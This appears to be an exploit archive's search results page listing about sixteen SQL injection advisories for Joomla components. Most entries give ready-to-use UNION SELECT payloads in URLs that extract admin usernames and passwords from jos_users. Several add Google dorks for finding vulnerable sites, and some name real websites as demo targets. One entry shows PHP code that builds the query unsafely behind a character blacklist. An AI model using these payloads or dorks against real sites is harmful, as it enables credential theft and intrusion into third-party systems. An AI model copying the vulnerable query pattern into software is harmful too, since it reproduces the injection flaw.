sql injection joomla
Search result for 'sql injection joomla'
Moudi/Joomla Speech SQL Injection ( na)
/*
Joomla Component com_speech (id) SQL Injection Vulnerability
Discovered By : Moudi
Contact : <m0udi@9.cn>
Download : OFF
Greetings : Mizoz, Zuka, str0ke, 599eme Man.
Please visit: http://unkn0wn.ws/board/index.php
*/
[+] Exploit SQL INJECTION:
- Joomla : com_speech .
- Poc:
http://127.0.0.1/index.php?option=com_speech&id=[SQL]
http://www.et.undp.org/index.php?option=com_speech&id=
SQL: null+union+select+1,2,version%28%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25--
The Joomla Speech component suffers from a remote SQL injection vulnerability.
N2n-Hacker/Joomla Route SQL Injection ( na)
# Title: Joomla com_route&kid Sql Injection Vulnerability
# Author: N2n-Hacker
# Date: 2010-03-16
# Script: --[Joomla]--
#########################################################################
# [ Joomla com_route&kid Sql Injection Vulnerability ]
# N2n-Hacker ----- 2nd@live.fr
#########################################################################
# Searching = ---" option=com_route "---
#
# USING = http://www.site.com/index.php?option=com_route&kid=-35022+
# UNION+SELECT+1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,
# 13,14,15,16,17,18,19,20,21 FROM JOOMLA USERS--&routing
#
# \\\\\\\\\\\\\\\\\\ Activer khfif drif //////////////////
#########################################################################
# My Bad Life But Not For4ver nchallah
#########################################################################
The Joomla Route component suffers from a remote SQL injection vulnerability.
Fl0riX/Joomla Alfresco SQL Injection ( na)
<------------------- header data start ------------------- >
#############################################################
# Joomla Component com_alfresco SQL Injection Vulnerability
#############################################################
# Author : FL0RiX
# Name : com_alfresco
# Greez : PyskE,Dr.Kacak And All Friends
# Bug Type : SQL Injection
# Infection : Admin login credentials can be obtained.
# Demo Vuln. : http://www.fincaterraqua.com/index.php?option=com_alfresco&task=edit&id_pan=[SQL INJ.]
# Bug Fix Advice : Harmful characters should be filtered.
#############################################################
< ------------------- header data end of ------------------- >
< -- bug code start -- >
path/index.php?option=com_alfresco&task=edit&id_pan=null/**/union/**/select/**/1,2,3,concat(username,0x3a,password)fl0rixf0r3v3r,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21/**/from/**/jos_users--
< -- bug code end of -- >
Joomla Alfresco suffers from a remote SQL injection vulnerability.
Skote Vahshat/Joomla Soft SQL Injection ( na)
#############################################################
[#] Application Name : Joomla (com_soft)
[#] Type : SQL Injection
[#] author : Skte_vahshat
[#] Google Dork : index.php?option=com_soft
[#] E-mail: skote.vahshat@gmail.com
[#] http://www.sthst.com/index.php?option=com_soft&cid=3
#############################################################
< ------------------- header data end of ------------------- >
Hello, new bug in Joomla
--------------------------------------------------
<?php
$id = $_GET['id'];
// ....
// Blacklist ("yasak" = forbidden) of characters stripped from the input
$yasak = array("\"", "\\", "/", "*", "", "=", "-", "#", ";", "<", ">", "+", "%");
$id = str_replace($yasak, "", $id);
// The filtered value is still concatenated into the query unquoted
$query = "SELECT * FROM users WHERE id=" . $id . ";";
// ...
?>
The Joomla Soft component suffers from a remote SQL injection vulnerability.
L0rd CrusAd3r/Joomla JBounceback SQL Injection ( na)
Author: L0rd CrusAd3r aka VSN [crusader_hmg@yahoo.com]
Exploit Title:Joomla com_jbounceback SQL Injection Vulnerability
Vendor url:http://ijoobi.com
Published: 2010-06-10
Greetz to:Sid3^effects, MaYur, M4n0j, Dark Blue®, S1ayer,d3c0d3r,KD and to all ICW members
Description:
Joomla com_jbounceback from ijoobi suffers from sql injection vulnerability .
Vulnerability:
*SQLi Vulnerability
DEMO URL :http://demo.ijoobi.com/index.php?option=com_jbounceback&Itemid=[sqli]
# 0day n0 m0re #
The Joomla JBounceback component suffers from a remote SQL injection vulnerability.
L0rd CrusAd3r/Joomla Jiptracker SQL Injection ( na)
Author: L0rd CrusAd3r aka VSN [crusader_hmg@yahoo.com]
Exploit Title:Joomla com_jiptracker SQL Injection Vulnerability
Vendor url:http://ijoobi.com
Published: 2010-06-10
Greetz to:Sid3^effects, MaYur, M4n0j, Dark Blue®, S1ayer,d3c0d3r,KD and to all ICW members
Description:
Joomla com_jiptracker from ijoobi suffers from sql injection vulnerability .
Vulnerability:
*SQLi Vulnerability
DEMO URL :http://demo.ijoobi.com/index.php?option=com_jiptracker&Itemid=[sqli]
# 0day n0 m0re #
The Joomla Jiptracker component suffers from a remote SQL injection vulnerability.
L0rd CrusAd3r/Joomla JLinks SQL Injection ( na)
Author: L0rd CrusAd3r aka VSN [crusader_hmg@yahoo.com]
Exploit Title:Joomla com_jlinks SQL Injection Vulnerability
Vendor url:http://ijoobi.com
Published: 2010-06-10
Greetz to:Sid3^effects, MaYur, M4n0j, Dark Blue®, S1ayer,d3c0d3r,KD and to all ICW members
Description:
Joomla com_jlinks from ijoobi suffers from sql injection vulnerability .
Vulnerability:
*SQLi Vulnerability
DEMO URL :http://demo.ijoobi.com/index.php?option=com_jlinks&Itemid=[sqli]
# 0day n0 m0re #
The Joomla JLinks component suffers from a remote SQL injection vulnerability.
L0rd CrusAd3r/Joomla RSGallery SQL Injection ( na)
Author: L0rd CrusAd3r aka VSN [crusader_hmg@yahoo.com]
Exploit Title:Joomla com_rsgallery SQL Injection Vulnerability
Vendor url:http://ijoobi.com
Published: 2010-06-10
Greetz to:Sid3^effects, MaYur, M4n0j, Dark Blue®, S1ayer,d3c0d3r,KD and to all ICW members
Description:
Joomla com_jlinks from ijoobi suffers from sql injection vulnerability .
Vulnerability:
*SQLi Vulnerability
DEMO URL :http://demo.ijoobi.com/index.php?option=com_rsgallery2&Itemid=[sqli]
# 0day n0 m0re #
The Joomla RSGallery component suffers from a remote SQL injection vulnerability.
bhunt3r/Joomla Mochigames SQL Injection ( na)
[~]>> ...[BEGIN ADVISORY]...
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
[~]>> TITLE: Joomla (com_mochigames) SQL Injection Vulnerability
[~]>> LANGUAGE: PHP
[~]>> DORK: N/A
[~]>> RESEARCHER: B-HUNT3|2
[~]>> CONTACT: bhunt3r[at_no_spam]gmail[dot_no_spam]com
[~]>> TESTED ON: LocalHost
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
[~]>> DESCRIPTION: Input var id is vulnerable to SQL Code Injection
[~]>> AFFECTED VERSIONS: Confirmed in 0.51 but probably other versions also
[~]>> RISK: Medium/High
[~]>> IMPACT: Execute Arbitrary SQL queries
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
[~]>> PROOF OF CONCEPT:
[~]>> http://[HOST]/[JOOMLA_PATH]/index.php?view=mochigames&id=[SQL]&option=com_mochigames&Itemid=80
[~]>> http://[HOST]/[JOOMLA_PATH]/index.php?view=mochigames&id=99999%27+union+select+1,2,username,4,password,6,7,8,9,10,11,12,13,14,15,16,17+from+jos_users%23&option=com_mochigames&Itemid=80
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
[~]>> ...[END ADVISORY]...
The Joomla Mochigames component suffers from a remote SQL injection vulnerability.
bhunt3r/Joomla JBPublishdownfp SQL Injection ( na)
[~]>> ...[BEGIN ADVISORY]...
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
[~]>> TITLE: Joomla (com_jbpublishdownfp) SQL Injection Vulnerability
[~]>> LANGUAGE: PHP
[~]>> DORK: N/A
[~]>> RESEARCHER: B-HUNT3|2
[~]>> CONTACT: bhunt3r[at_no_spam]gmail[dot_no_spam]com
[~]>> TESTED ON: LocalHost
[~]>> PRE-REQUIREMENTS: Privileged user
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
[~]>> DESCRIPTION: Input var cid[] is vulnerable to SQL Code Injection
[~]>> AFFECTED VERSIONS: Confirmed in 1.4 but probably other versions also
[~]>> RISK: Low/Medium
[~]>> IMPACT: Execute Arbitrary SQL queries
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
[~]>> PROOFS OF CONCEPT:
[~]>> http://[HOST]/[JOOMLA_PATH]/administrator/index.php?option=com_jbpublishdownfp&task=edit&cid[]=[SQL]
[~]>> http://[HOST]/[JOOMLA_PATH]/administrator/index.php?option=com_jbpublishdownfp&task=edit&cid[]=-1+union+all+select+concat(username,0x3A3A3A,password)+from+jos_users
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
[~]>> ...[END ADVISORY]...
The Joomla JBPublishdownfp component suffers from a remote SQL injection vulnerability.
NeX HaCkeR/Joomla Question SQL Injection ( na)
###################################################
# |Title : Joomla (com_question) SQL Injection Vulnerability
# |Vendor : http://www.alex-ensdorf.de/
# |Version : Joomla 1.5
# |Date : 15/5/2011
# |Author : NeX HaCkEr
# |Contact : Error_log@hotmail.com
##################################################
# | Exploit :
# | http://localhost/Joomla/index.php/?option=com_question&catID=[SQL]
# | http://localhost/Joomla/index.php/?option=com_question&catID=21' and+1=0 union all
# | select 1,2,3,4,5,6,concat(username,0x3a,password),8,9 from jos_users--%20
##################################################
# | Demo:
# | http://site.com/index.php/?option=com_question&catID=21' and+1=0 union all select
# | 1,2,3,4,5,6,concat(username,0x3a,password),8,9 from jos_users--%20
##################################################
# | Greetz :
# | Dr.KAsBeR & DaShEr & MaFiA & WeeD
##################################################
The Joomla Question component suffers from a remote SQL injection vulnerability.
SOLVER/Joomla Foto SQL Injection ( na)
<------------------- header data start ------------------- >
#############################################################
Joomla Component Com_foto SQL Injection Vulnerability
#############################################################
# Author : SOLVER ~ Bug Researchers
# Date : 18.06.2011
# Name : Joomla com_foto
# Bug Type : SQL injection
# Infection : Admin login credentials can be obtained.
# Example Vuln :
[+]/index.php?option=com_foto&task=categoria&id_categoria=[EXPLOIT]
[+] Dork:inurl:"com_foto"
[+] Demo: http://site/index.php?option=com_foto&task=categoria&id_categoria=-4+union+select+1,password,username,4,5,6,7+from+jos_users--
# Bug Fix Advice : Harmful characters should be filtered.
#############################################################
The Joomla Foto component suffers from a remote SQL injection vulnerability.
SOLVER/Joomla Controller SQL Injection ( na)
<------------------- header data start ------------------- >
#############################################################
Joomla Component Com_Controller SQL Injection Vulnerability
#############################################################
# Author : SOLVER ~ Bug Researchers
# Date : 13.06.2011
# Name : Joomla com_controller
# Bug Type : SQL injection
# Infection : Admin login credentials can be obtained.
# Example Vuln :
[+]/index.php?option=com_controller&id=53&Itemid=[EXPLOIT]
[+] Dork:inurl:"com_controller"
[+] Demo: http://site/index.php?option=com_controller&id=53&Itemid=-16+union+select+1,2,3,4,5,6,7,8,9--
# Bug Fix Advice : Harmful characters should be filtered.
#############################################################
The Joomla Controller component suffers from a remote SQL injection vulnerability.
SOLVER/Joomla Joomnik SQL Injection ( na)
<------------------- header data start ------------------- >
#############################################################
Joomla Component Joomnik Gallery SQL Injection Vulnerability
#############################################################
# Author : SOLVER ~ Bug Researchers
# Date : 26.05.2011
# Greetz : DreamPower - CWKOMANDO - Toprak - Equ - Err0r - 10line
# Name : Joomla com_joomnik
# Bug Type : SQL injection
# Infection : Admin login credentials can be obtained.
# Example Vuln :
[+]/index.php?option=com_joomnik&album=[EXPLOIT]
[+] Dork:"com_joomnik"
[+] Demo: http://site.com/index.php?option=com_joomnik&album=6'
# Bug Fix Advice : Harmful characters should be filtered.
#############################################################
http://joomlacode.org/gf/project/joomnik/
The Joomla Joomnik component suffers from a remote SQL injection vulnerability.
Fl0riX/Joomla Client SQL Injection ( na)
<------------------- header data start ------------------- >
#############################################################
Joomla Component client SQL Injection Vulnerability
#############################################################
# Author : Fl0riX ~ Bug Researchers
# Name : Joomla com_client
# Bug Type : SQL injection
# Infection : Admin login credentials can be obtained.
# Demo Vuln :
[+]/index.php?option=com_client&task=category&prf=fl0&catid=1[EXPLOIT]
[+] Dork: inurl:"index.php?option=com_client"
# Bug Fix Advice : Harmful characters should be filtered.
#############################################################
< ------------------- header data end of ------------------- >
< -- bug code start -- >
EXPLOIT : +and+1=2+union+select+1,concat(username,0x3a,email)fl0rix,3,4,5,6+from+jos_users--
< -- bug code end of -- >
The Joomla Client component suffers from a remote SQL injection vulnerability.